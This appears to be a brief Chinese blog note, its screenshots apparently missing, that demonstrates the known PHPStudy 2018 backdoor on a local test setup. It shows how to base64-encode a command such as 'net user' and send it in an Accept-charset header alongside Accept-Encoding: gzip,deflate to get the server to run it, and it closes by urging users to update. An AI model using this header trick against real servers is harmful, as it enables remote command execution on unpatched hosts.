PHPstudy2018 后门简单使用

首先声明，仅为记录使用。

测试用例php-5.4.45 + Apache

 

 

 

index.php 

 

 

使用Firefox 浏览器，可以编辑并且重发http请求

 

 

 

打印出“net user” base64 加密后的密文

 

 

 

 

 

 

 

 

 

 

 

本地 “net user”

 

 

 

 

用上面打印出来的密文,提交

Accept-Encoding: gzip,deflate
Accept-charset: ******
(如箭头所指，有空格请去掉)

 

 

 

 

 

 

与本地内容一致...

 

 

 

 

漏洞所影响的版本如下

 

 

此后门案件官宣早已解决，请有后门的用户，尽快更新最新版本。

请认准官方下载渠道https://www.xp.cn/